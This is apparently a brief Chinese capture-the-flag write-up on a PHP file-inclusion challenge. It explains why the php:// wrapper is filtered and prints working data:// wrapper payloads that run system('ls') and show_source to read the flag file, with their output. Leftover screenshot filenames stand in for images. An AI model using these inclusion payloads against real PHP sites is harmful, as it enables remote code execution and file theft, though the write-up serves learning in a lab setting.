XW`_R}P~EV}C23D02X~_SNH.png分析代码:通过get方式传入page的值,遍历page中有无php://,有的话全部清空,意味着php://伪协议行不通。可以用data伪协议代替
    payload:
    //查看当前目录下的文件
    ?page=data://text/plain,<?php system(“ls”);?>
    执行结果:
    fl4gisisish3r3.php index.php phpinfo.php
    //发现flag文件,读取此文件:
    ?page=data://text/plain,<?php%20show_source(“fl4gisisish3r3.php”)?>
    得到flag
    UDT76J3Q)(TF0FE2(BOF%2H.jpg